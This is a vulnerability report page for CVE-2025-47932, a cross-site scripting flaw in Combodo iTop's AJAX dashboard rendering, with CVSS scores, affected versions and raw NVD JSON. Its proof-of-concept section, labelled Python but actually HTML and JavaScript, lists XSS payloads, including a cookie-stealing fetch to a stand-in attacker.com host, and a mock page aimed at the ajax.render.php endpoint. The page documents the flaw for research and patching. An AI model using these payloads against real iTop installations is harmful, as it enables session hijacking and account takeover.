Security Vulnerability Report
中文
CVE-2025-47932 CVSS 8.8 HIGH

CVE-2025-47932

Published: 2025-11-10 20:15:42
Last Modified: 2025-11-21 21:13:19

Description

Combodo iTop is a web based IT service management tool. Versions prior to 2.7.13 and 3.2.2 are vulnerable to cross-site scripting when a dashboard is rendered via an AJAX call. Versions 2.7.13 and 3.2.2 sanitize the var responsible for the attack.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
Combodo iTop < 2.7.13
Combodo iTop < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-47932 XSS PoC for Combodo iTop --> <!-- This PoC demonstrates the XSS vulnerability in iTop dashboard AJAX rendering --> <!-- Usage: Inject this payload into dashboard configuration or via AJAX parameter --> <!-- Basic XSS payload --> <script>alert('XSS - CVE-2025-47932')</script> <!-- Event handler based XSS payload --> <img src=x onerror="alert('XSS - CVE-2025-47932')"> <!-- Steal session cookie payload --> <script> fetch('https://attacker.com/steal?cookie=' + document.cookie); </script> <!-- AJAX-based dashboard exploit example --> <!-- Target URL: /pages/ajax.render.php?operation=render_dashboard --> <!-- Parameter manipulation to inject XSS --> <!DOCTYPE html> <html> <head> <title>CVE-2025-47932 PoC</title> </head> <body> <h1>Combodo iTop XSS Vulnerability PoC</h1> <p>Vulnerable parameter: dashboard configuration via AJAX</p> <script> // Simulate AJAX request to vulnerable endpoint var vulnerableUrl = 'https://target-itop-site/pages/ajax.render.php'; var maliciousDashboard = { 'title': '<script>alert("XSS CVE-2025-47932")</script>', 'components': [ {'type': 'custom', 'content': '<img src=x onerror=alert("XSS")>'} ] }; // PoC: Send malicious dashboard configuration // fetch(vulnerableUrl + '?operation=render_dashboard', { // method: 'POST', // body: JSON.stringify(maliciousDashboard), // headers: {'Content-Type': 'application/json'} // }); console.log('PoC payload prepared for CVE-2025-47932'); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47932", "sourceIdentifier": "[email protected]", "published": "2025-11-10T20:15:42.363", "lastModified": "2025-11-21T21:13:18.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Combodo iTop is a web based IT service management tool. Versions prior to 2.7.13 and 3.2.2 are vulnerable to cross-site scripting when a dashboard is rendered via an AJAX call. Versions 2.7.13 and 3.2.2 sanitize the var responsible for the attack."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.13", "matchCriteriaId": "4738ED01-0CAC-4A19-BE9F-B7E89AAD8D23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.2", "matchCriteriaId": "EAF7CD83-4986-43B2-9A2B-3E282671B00F"}]}]}], "references": [{"url": "https://github.com/Combodo/iTop/security/advisories/GHSA-rmxq-fx69-7wg5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}